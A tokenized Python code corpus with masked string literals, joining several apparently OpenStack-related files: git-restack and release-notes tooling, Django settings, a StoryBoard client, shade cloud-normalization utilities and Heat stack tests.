<EOL> """<STR_LIT>""" <EOL> git_restack = utils . run_cmd ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> kwargs . setdefault ( '<STR_LIT>' , self . local_dir ) <EOL> return utils . run_cmd ( git_restack , * args , ** kwargs ) <EOL> def _simple_change ( self , dirname , change_text , commit_message , <EOL> file_ = None ) : <EOL> """<STR_LIT>""" <EOL> if file_ is None : <EOL> file_ = self . _dir ( dirname , '<STR_LIT>' ) <EOL> utils . write_to_file ( file_ , change_text . encode ( ) ) <EOL> self . _run_git ( dirname , '<STR_LIT>' , file_ ) <EOL> self . _run_git ( dirname , '<STR_LIT>' , '<STR_LIT>' , commit_message ) <EOL> def _git_log ( self , dirname ) : <EOL> out = self . _run_git ( dirname , '<STR_LIT>' , '<STR_LIT>' ) <EOL> commits = [ ] <EOL> for line in out . split ( '<STR_LIT:\n>' ) : <EOL> commits . append ( line . split ( '<STR_LIT:U+0020>' , <NUM_LIT:1> ) ) <EOL> return commits </s>
<s> import os <EOL> PROJECT_PATH = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> SERVE_STATIC = True <EOL> SITE_ROOT = '<STR_LIT>' <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> SITE_ID = <NUM_LIT:1> <EOL> STATIC_URL = '<STR_LIT>' <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> INSTALLED_APPS = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> AUTHENTICATION_BACKENDS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> OPENID_CREATE_USERS = True <EOL> OPENID_STRICT_USERNAMES = True <EOL> OPENID_REUSE_USERS = True <EOL> OPENID_UPDATE_DETAILS_FROM_SREG = True <EOL> OPENID_SSO_SERVER_URL = '<STR_LIT>' <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT:/>' <EOL> try : <EOL> from local_settings import * <EOL> except ImportError : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import uuid <EOL> def generate_uuid ( ) : <EOL> return str ( uuid . uuid4 ( ) ) <EOL> def is_uuid_like ( val ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return str ( uuid . UUID ( val ) ) == val <EOL> except ( TypeError , ValueError , AttributeError ) : <EOL> return False </s>
<s> from storyboardclient import base <EOL> from storyboardclient . v1 import users <EOL> class UsersNestedManager ( base . BaseNestedManager ) : <EOL> parent_url_key = "<STR_LIT>" <EOL> url_key = "<STR_LIT>" <EOL> resource_class = users . User <EOL> def add ( self , user ) : <EOL> if isinstance ( user , users . User ) : <EOL> user_id = user . id <EOL> else : <EOL> user_id = user <EOL> self . put ( id = user_id ) <EOL> def remove ( self , user ) : <EOL> if isinstance ( user , users . User ) : <EOL> user_id = user . id <EOL> else : <EOL> user_id = user <EOL> self . delete ( id = user_id ) <EOL> class Team ( base . BaseObject ) : <EOL> name = None <EOL> users = UsersNestedManager <EOL> class TeamsManager ( base . BaseManager ) : <EOL> url_key = "<STR_LIT>" <EOL> resource_class = Team </s>
<s> import argparse <EOL> import os <EOL> from releasetools import release_notes <EOL> def main ( ) : <EOL> parser = argparse . ArgumentParser ( <EOL> prog = '<STR_LIT>' , <EOL> description = __doc__ , <EOL> formatter_class = argparse . RawDescriptionHelpFormatter ) <EOL> parser . add_argument ( "<STR_LIT>" , metavar = '<STR_LIT:path>' , action = "<STR_LIT:store>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> action = "<STR_LIT:store>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , metavar = '<STR_LIT>' , <EOL> action = "<STR_LIT:store>" , <EOL> nargs = '<STR_LIT:?>' , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( '<STR_LIT>' , <EOL> action = '<STR_LIT:store_true>' , <EOL> default = False , <EOL> help = '<STR_LIT>' , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group = parser . add_argument_group ( '<STR_LIT>' ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> action = '<STR_LIT:store_true>' , default = False , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> default = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> email_group . add_argument ( <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , <EOL> ) <EOL> args = parser . parse_args ( ) <EOL> library_path = os . path . abspath ( args . library ) <EOL> notes = release_notes . generate_release_notes ( <EOL> library = args . library , <EOL> library_path = library_path , <EOL> start_revision = args . start_revision , <EOL> end_revision = args . end_revision , <EOL> show_dates = args . show_dates , <EOL> skip_requirement_merges = args . skip_requirement_merges , <EOL> is_stable = args . stable , <EOL> series = args . series , <EOL> email = args . email , <EOL> email_from = args . email_from , <EOL> email_to = args . email_to , <EOL> email_reply_to = args . email_reply_to , <EOL> email_tags = args . email_tags , <EOL> include_pypi_link = args . include_pypi_link , <EOL> changes_only = args . changes_only , <EOL> first_release = args . first_release , <EOL> ) <EOL> print ( notes . encode ( '<STR_LIT:utf-8>' ) ) <EOL> return <NUM_LIT:0> </s>
<s> import contextlib <EOL> import inspect <EOL> import munch <EOL> import netifaces <EOL> import re <EOL> import six <EOL> import time <EOL> from decorator import decorator <EOL> from heatclient import exc as heat_exc <EOL> from neutronclient . common import exceptions as neutron_exc <EOL> from shade import _log <EOL> from shade import exc <EOL> from shade import meta <EOL> log = _log . setup_logging ( __name__ ) <EOL> _decorated_methods = [ ] <EOL> def _iterate_timeout ( timeout , message , wait = <NUM_LIT:2> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> wait = float ( wait ) <EOL> except ValueError : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( wait = wait ) ) <EOL> start = time . time ( ) <EOL> count = <NUM_LIT:0> <EOL> while ( timeout is None ) or ( time . time ( ) < start + timeout ) : <EOL> count += <NUM_LIT:1> <EOL> yield count <EOL> log . debug ( '<STR_LIT>' . format ( wait = wait ) ) <EOL> time . sleep ( wait ) <EOL> raise exc . OpenStackCloudTimeout ( message ) <EOL> def _filter_list ( data , name_or_id , filters ) : <EOL> """<STR_LIT>""" <EOL> if name_or_id : <EOL> identifier_matches = [ ] <EOL> for e in data : <EOL> e_id = str ( e . get ( '<STR_LIT:id>' , None ) ) <EOL> e_name = e . get ( '<STR_LIT:name>' , None ) <EOL> if str ( name_or_id ) in ( e_id , e_name ) : <EOL> identifier_matches . append ( e ) <EOL> data = identifier_matches <EOL> if not filters : <EOL> return data <EOL> def _dict_filter ( f , d ) : <EOL> if not d : <EOL> return False <EOL> for key in f . keys ( ) : <EOL> if isinstance ( f [ key ] , dict ) : <EOL> if not _dict_filter ( f [ key ] , d . get ( key , None ) ) : <EOL> return False <EOL> elif d . get ( key , None ) != f [ key ] : <EOL> return False <EOL> return True <EOL> filtered = [ ] <EOL> for e in data : <EOL> filtered . append ( e ) <EOL> for key in filters . keys ( ) : <EOL> if isinstance ( filters [ key ] , dict ) : <EOL> if not _dict_filter ( filters [ key ] , e . get ( key , None ) ) : <EOL> filtered . pop ( ) <EOL> break <EOL> elif e . get ( key , None ) != filters [ key ] : <EOL> filtered . pop ( ) <EOL> break <EOL> return filtered <EOL> def _get_entity ( func , name_or_id , filters , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( name_or_id , '<STR_LIT:id>' ) : <EOL> return name_or_id <EOL> entities = func ( name_or_id , filters , ** kwargs ) <EOL> if not entities : <EOL> return None <EOL> if len ( entities ) > <NUM_LIT:1> : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" % name_or_id ) <EOL> return entities [ <NUM_LIT:0> ] <EOL> def normalize_servers ( servers , cloud_name , region_name ) : <EOL> ret = [ ] <EOL> for server in servers : <EOL> ret . append ( normalize_server ( server , cloud_name , region_name ) ) <EOL> return ret <EOL> def normalize_server ( server , cloud_name , region_name ) : <EOL> server . pop ( '<STR_LIT>' , None ) <EOL> server [ '<STR_LIT>' ] . pop ( '<STR_LIT>' , None ) <EOL> if str ( server [ '<STR_LIT:image>' ] ) != server [ '<STR_LIT:image>' ] : <EOL> server [ '<STR_LIT:image>' ] . pop ( '<STR_LIT>' , None ) <EOL> server [ '<STR_LIT>' ] = region_name <EOL> server [ '<STR_LIT>' ] = cloud_name <EOL> az = server . get ( '<STR_LIT>' , None ) <EOL> if az : <EOL> server [ '<STR_LIT>' ] = az <EOL> server [ '<STR_LIT>' ] = [ ] <EOL> return server <EOL> def normalize_keystone_services ( services ) : <EOL> """<STR_LIT>""" <EOL> ret = [ ] <EOL> for service in services : <EOL> service_type = service . get ( '<STR_LIT:type>' , service . get ( '<STR_LIT>' ) ) <EOL> new_service = { <EOL> '<STR_LIT:id>' : service [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:name>' : service [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : service . get ( '<STR_LIT:description>' , None ) , <EOL> '<STR_LIT:type>' : service_type , <EOL> '<STR_LIT>' : service_type , <EOL> '<STR_LIT>' : service [ '<STR_LIT>' ] <EOL> } <EOL> ret . append ( new_service ) <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_nova_secgroups ( groups ) : <EOL> """<STR_LIT>""" <EOL> ret = [ { '<STR_LIT:id>' : g [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT:name>' : g [ '<STR_LIT:name>' ] , <EOL> '<STR_LIT:description>' : g [ '<STR_LIT:description>' ] , <EOL> '<STR_LIT>' : normalize_nova_secgroup_rules ( g [ '<STR_LIT>' ] ) <EOL> } for g in groups ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_nova_secgroup_rules ( rules ) : <EOL> """<STR_LIT>""" <EOL> ret = [ { '<STR_LIT:id>' : r [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> None if r [ '<STR_LIT>' ] == - <NUM_LIT:1> else r [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : <EOL> None if r [ '<STR_LIT>' ] == - <NUM_LIT:1> else r [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : r [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : r [ '<STR_LIT>' ] . get ( '<STR_LIT>' , None ) , <EOL> '<STR_LIT>' : r [ '<STR_LIT>' ] <EOL> } for r in rules ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_nova_floating_ips ( ips ) : <EOL> """<STR_LIT>""" <EOL> ret = [ dict ( <EOL> id = ip [ '<STR_LIT:id>' ] , <EOL> fixed_ip_address = ip . get ( '<STR_LIT>' ) , <EOL> floating_ip_address = ip [ '<STR_LIT>' ] , <EOL> network = ip [ '<STR_LIT>' ] , <EOL> attached = ( ip . get ( '<STR_LIT>' ) is not None and <EOL> ip . get ( '<STR_LIT>' ) != '<STR_LIT>' ) , <EOL> status = '<STR_LIT>' <EOL> ) for ip in ips ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_neutron_floating_ips ( ips ) : <EOL> """<STR_LIT>""" <EOL> ret = [ ] <EOL> for ip in ips : <EOL> network_id = ip . get ( '<STR_LIT>' , ip . get ( '<STR_LIT>' ) ) <EOL> ret . append ( dict ( <EOL> id = ip [ '<STR_LIT:id>' ] , <EOL> fixed_ip_address = ip . get ( '<STR_LIT>' ) , <EOL> floating_ip_address = ip [ '<STR_LIT>' ] , <EOL> network = network_id , <EOL> floating_network_id = network_id , <EOL> port_id = ip . get ( '<STR_LIT>' ) , <EOL> router_id = ip . get ( '<STR_LIT>' ) , <EOL> attached = ( ip . get ( '<STR_LIT>' ) is not None and <EOL> ip . get ( '<STR_LIT>' ) != '<STR_LIT>' ) , <EOL> status = ip [ '<STR_LIT:status>' ] , <EOL> ) ) <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def localhost_supports_ipv6 ( ) : <EOL> """<STR_LIT>""" <EOL> return netifaces . AF_INET6 in netifaces . gateways ( ) [ '<STR_LIT:default>' ] <EOL> def normalize_users ( users ) : <EOL> ret = [ <EOL> dict ( <EOL> id = user . get ( '<STR_LIT:id>' ) , <EOL> email = user . get ( '<STR_LIT:email>' ) , <EOL> name = user . get ( '<STR_LIT:name>' ) , <EOL> username = user . get ( '<STR_LIT:username>' ) , <EOL> default_project_id = user . get ( '<STR_LIT>' , <EOL> user . get ( '<STR_LIT>' ) ) , <EOL> domain_id = user . get ( '<STR_LIT>' ) , <EOL> enabled = user . get ( '<STR_LIT>' ) , <EOL> ) for user in users <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_volumes ( volumes ) : <EOL> ret = [ ] <EOL> for vol in volumes : <EOL> new_vol = vol . copy ( ) <EOL> name = vol . get ( '<STR_LIT:name>' , vol . get ( '<STR_LIT>' ) ) <EOL> description = vol . get ( '<STR_LIT:description>' , vol . get ( '<STR_LIT>' ) ) <EOL> new_vol [ '<STR_LIT:name>' ] = name <EOL> new_vol [ '<STR_LIT>' ] = name <EOL> new_vol [ '<STR_LIT:description>' ] = description <EOL> new_vol [ '<STR_LIT>' ] = description <EOL> for field in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if field in new_vol and isinstance ( new_vol [ field ] , <EOL> six . string_types ) : <EOL> if new_vol [ field ] is not None : <EOL> if new_vol [ field ] . lower ( ) == '<STR_LIT:true>' : <EOL> new_vol [ field ] = True <EOL> elif new_vol [ field ] . lower ( ) == '<STR_LIT:false>' : <EOL> new_vol [ field ] = False <EOL> ret . append ( new_vol ) <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_domains ( domains ) : <EOL> ret = [ <EOL> dict ( <EOL> id = domain . get ( '<STR_LIT:id>' ) , <EOL> name = domain . get ( '<STR_LIT:name>' ) , <EOL> description = domain . get ( '<STR_LIT:description>' ) , <EOL> enabled = domain . get ( '<STR_LIT>' ) , <EOL> ) for domain in domains <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_groups ( domains ) : <EOL> """<STR_LIT>""" <EOL> ret = [ <EOL> dict ( <EOL> id = domain . get ( '<STR_LIT:id>' ) , <EOL> name = domain . get ( '<STR_LIT:name>' ) , <EOL> description = domain . get ( '<STR_LIT:description>' ) , <EOL> domain_id = domain . get ( '<STR_LIT>' ) , <EOL> ) for domain in domains <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_role_assignments ( assignments ) : <EOL> """<STR_LIT>""" <EOL> new_assignments = [ ] <EOL> for assignment in assignments : <EOL> new_val = munch . Munch ( { '<STR_LIT:id>' : assignment [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] } ) <EOL> for scope in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if scope in assignment [ '<STR_LIT>' ] : <EOL> new_val [ scope ] = assignment [ '<STR_LIT>' ] [ scope ] [ '<STR_LIT:id>' ] <EOL> for assignee in ( '<STR_LIT:user>' , '<STR_LIT>' ) : <EOL> if assignee in assignment : <EOL> new_val [ assignee ] = assignment [ assignee ] [ '<STR_LIT:id>' ] <EOL> new_assignments . append ( new_val ) <EOL> return new_assignments <EOL> def normalize_roles ( roles ) : <EOL> """<STR_LIT>""" <EOL> ret = [ <EOL> dict ( <EOL> id = role . get ( '<STR_LIT:id>' ) , <EOL> name = role . get ( '<STR_LIT:name>' ) , <EOL> ) for role in roles <EOL> ] <EOL> return meta . obj_list_to_dict ( ret ) <EOL> def normalize_stacks ( stacks ) : <EOL> """<STR_LIT>""" <EOL> for stack in stacks : <EOL> stack [ '<STR_LIT:name>' ] = stack [ '<STR_LIT>' ] <EOL> return stacks <EOL> def normalize_flavors ( flavors ) : <EOL> """<STR_LIT>""" <EOL> for flavor in flavors : <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> flavor . pop ( '<STR_LIT>' , None ) <EOL> if '<STR_LIT>' not in flavor : <EOL> flavor [ '<STR_LIT>' ] = { } <EOL> ephemeral = flavor . pop ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> is_public = flavor . pop ( '<STR_LIT>' , True ) <EOL> flavor [ '<STR_LIT>' ] = ephemeral <EOL> flavor [ '<STR_LIT>' ] = ephemeral <EOL> flavor [ '<STR_LIT>' ] = is_public <EOL> flavor [ '<STR_LIT>' ] = is_public <EOL> return flavors <EOL> def valid_kwargs ( * valid_args ) : <EOL> @ decorator <EOL> def func_wrapper ( func , * args , ** kwargs ) : <EOL> argspec = inspect . getargspec ( func ) <EOL> for k in kwargs : <EOL> if k not in argspec . args [ <NUM_LIT:1> : ] and k not in valid_args : <EOL> raise TypeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( f = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] , arg = k ) ) <EOL> return func ( * args , ** kwargs ) <EOL> return func_wrapper <EOL> def cache_on_arguments ( * cache_on_args , ** cache_on_kwargs ) : <EOL> def _inner_cache_on_arguments ( func ) : <EOL> def _cache_decorator ( obj , * args , ** kwargs ) : <EOL> the_method = obj . _cache . cache_on_arguments ( <EOL> * cache_on_args , ** cache_on_kwargs ) ( <EOL> func . __get__ ( obj , type ( obj ) ) ) <EOL> return the_method ( * args , ** kwargs ) <EOL> def invalidate ( obj , * args , ** kwargs ) : <EOL> return obj . _cache . cache_on_arguments ( ) ( func ) . invalidate ( <EOL> * args , ** kwargs ) <EOL> _cache_decorator . invalidate = invalidate <EOL> _cache_decorator . func = func <EOL> _decorated_methods . append ( func . __name__ ) <EOL> return _cache_decorator <EOL> return _inner_cache_on_arguments <EOL> @ contextlib . contextmanager <EOL> def heat_exceptions ( error_message ) : <EOL> try : <EOL> yield <EOL> except heat_exc . NotFound as e : <EOL> raise exc . OpenStackCloudResourceNotFound ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> except Exception as e : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> @ contextlib . contextmanager <EOL> def neutron_exceptions ( error_message ) : <EOL> try : <EOL> yield <EOL> except neutron_exc . NotFound as e : <EOL> raise exc . OpenStackCloudResourceNotFound ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> except neutron_exc . NeutronClientException as e : <EOL> if e . status_code == <NUM_LIT> : <EOL> raise exc . OpenStackCloudURINotFound ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> else : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> except Exception as e : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( msg = error_message , exc = str ( e ) ) ) <EOL> @ contextlib . contextmanager <EOL> def shade_exceptions ( error_message = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> yield <EOL> except exc . OpenStackCloudException : <EOL> raise <EOL> except Exception as e : <EOL> if error_message is None : <EOL> error_message = str ( e ) <EOL> raise exc . OpenStackCloudException ( error_message ) <EOL> def safe_dict_min ( key , data ) : <EOL> """<STR_LIT>""" <EOL> min_value = None <EOL> for d in data : <EOL> if ( key in d ) and ( d [ key ] is not None ) : <EOL> try : <EOL> val = int ( d [ key ] ) <EOL> except ValueError : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> key = key , value = d [ key ] ) <EOL> ) <EOL> if ( min_value is None ) or ( val < min_value ) : <EOL> min_value = val <EOL> return min_value <EOL> def safe_dict_max ( key , data ) : <EOL> """<STR_LIT>""" <EOL> max_value = None <EOL> for d in data : <EOL> if ( key in d ) and ( d [ key ] is not None ) : <EOL> try : <EOL> val = int ( d [ key ] ) <EOL> except ValueError : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> key = key , value = d [ key ] ) <EOL> ) <EOL> if ( max_value is None ) or ( val > max_value ) : <EOL> max_value = val <EOL> return max_value <EOL> def parse_range ( value ) : <EOL> """<STR_LIT>""" <EOL> if value is None : <EOL> return None <EOL> range_exp = re . match ( '<STR_LIT>' , value ) <EOL> if range_exp is None : <EOL> return None <EOL> op = range_exp . group ( <NUM_LIT:1> ) <EOL> num = int ( range_exp . group ( <NUM_LIT:2> ) ) <EOL> return ( op , num ) <EOL> def range_filter ( data , key , range_exp ) : <EOL> """<STR_LIT>""" <EOL> filtered = [ ] <EOL> range_exp = str ( range_exp ) . upper ( ) <EOL> if range_exp == "<STR_LIT>" : <EOL> key_min = safe_dict_min ( key , data ) <EOL> if key_min is None : <EOL> return [ ] <EOL> for d in data : <EOL> if int ( d [ key ] ) == key_min : <EOL> filtered . append ( d ) <EOL> return filtered <EOL> elif range_exp == "<STR_LIT>" : <EOL> key_max = safe_dict_max ( key , data ) <EOL> if key_max is None : <EOL> return [ ] <EOL> for d in data : <EOL> if int ( d [ key ] ) == key_max : <EOL> filtered . append ( d ) <EOL> return filtered <EOL> val_range = parse_range ( range_exp ) <EOL> if val_range is None : <EOL> raise exc . OpenStackCloudException ( <EOL> "<STR_LIT>" . format ( value = range_exp ) ) <EOL> op = val_range [ <NUM_LIT:0> ] <EOL> if op : <EOL> for d in data : <EOL> d_val = int ( d [ key ] ) <EOL> if op == '<STR_LIT:<>' : <EOL> if d_val < val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> elif op == '<STR_LIT:>>' : <EOL> if d_val > val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> elif op == '<STR_LIT>' : <EOL> if d_val <= val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> elif op == '<STR_LIT>' : <EOL> if d_val >= val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> return filtered <EOL> else : <EOL> for d in data : <EOL> if int ( d [ key ] ) == val_range [ <NUM_LIT:1> ] : <EOL> filtered . append ( d ) <EOL> return filtered </s>
<s> """<STR_LIT>""" <EOL> import tempfile <EOL> from shade import exc <EOL> from shade import openstack_cloud <EOL> from shade . tests import base <EOL> simple_template = '''<STR_LIT>''' <EOL> root_template = '''<STR_LIT>''' <EOL> environment = '''<STR_LIT>''' <EOL> validate_template = '''<STR_LIT>''' <EOL> class TestStack ( base . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestStack , self ) . setUp ( ) <EOL> self . cloud = openstack_cloud ( cloud = '<STR_LIT>' ) <EOL> if not self . cloud . has_service ( '<STR_LIT>' ) : <EOL> self . skipTest ( '<STR_LIT>' ) <EOL> def _cleanup_stack ( self ) : <EOL> self . cloud . delete_stack ( self . stack_name , wait = True ) <EOL> self . assertIsNone ( self . cloud . get_stack ( self . stack_name ) ) <EOL> def test_stack_validation ( self ) : <EOL> test_template = tempfile . NamedTemporaryFile ( delete = False ) <EOL> test_template . write ( validate_template ) <EOL> test_template . close ( ) <EOL> stack_name = self . getUniqueString ( '<STR_LIT>' ) <EOL> self . assertRaises ( exc . OpenStackCloudException , <EOL> self . cloud . create_stack , <EOL> name = stack_name , <EOL> template_file = test_template . name ) <EOL> def test_stack_simple ( self ) : <EOL> test_template = tempfile . NamedTemporaryFile ( delete = False ) <EOL> test_template . write ( simple_template ) <EOL> test_template . close ( ) <EOL> self . stack_name = self . getUniqueString ( '<STR_LIT>' ) <EOL> self . addCleanup ( self . _cleanup_stack ) <EOL> stack = self . cloud . create_stack ( name = self . stack_name , <EOL> template_file = test_template . name , <EOL> wait = True ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> rand = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( <NUM_LIT:10> , len ( rand ) ) <EOL> stack = self . cloud . get_stack ( self . stack_name ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( rand , stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> stacks = self . cloud . list_stacks ( ) <EOL> stack_ids = [ s [ '<STR_LIT:id>' ] for s in stacks ] <EOL> self . assertIn ( stack [ '<STR_LIT:id>' ] , stack_ids ) <EOL> stack = self . cloud . update_stack ( self . stack_name , <EOL> template_file = test_template . name , <EOL> wait = True ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> rand = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( rand , stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> stack = self . cloud . update_stack ( self . stack_name , <EOL> template_file = test_template . name , <EOL> wait = True , <EOL> length = <NUM_LIT:12> ) <EOL> stack = self . cloud . get_stack ( self . stack_name ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> new_rand = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertNotEqual ( rand , new_rand ) <EOL> self . assertEqual ( <NUM_LIT:12> , len ( new_rand ) ) <EOL> def test_stack_nested ( self ) : <EOL> test_template = tempfile . NamedTemporaryFile ( <EOL> suffix = '<STR_LIT>' , delete = False ) <EOL> test_template . write ( root_template ) <EOL> test_template . close ( ) <EOL> simple_tmpl = tempfile . NamedTemporaryFile ( suffix = '<STR_LIT>' , delete = False ) <EOL> simple_tmpl . write ( simple_template ) <EOL> simple_tmpl . close ( ) <EOL> env = tempfile . NamedTemporaryFile ( suffix = '<STR_LIT>' , delete = False ) <EOL> env . write ( environment % simple_tmpl . name ) <EOL> env . close ( ) <EOL> self . stack_name = self . getUniqueString ( '<STR_LIT>' ) <EOL> self . addCleanup ( self . _cleanup_stack ) <EOL> stack = self . cloud . create_stack ( name = self . stack_name , <EOL> template_file = test_template . name , <EOL> environment_files = [ env . name ] , <EOL> wait = True ) <EOL> self . assertEqual ( '<STR_LIT>' , stack [ '<STR_LIT>' ] ) <EOL> rands = stack [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> self . assertEqual ( [ '<STR_LIT:0>' , '<STR_LIT:1>' , '<STR_LIT:2>' , '<STR_LIT:3>' , '<STR_LIT:4>' ] , sorted ( rands . keys ( ) ) ) <EOL> for rand in rands . values ( ) : <EOL> self . assertEqual ( <NUM_LIT:10> , len ( rand ) ) </s>
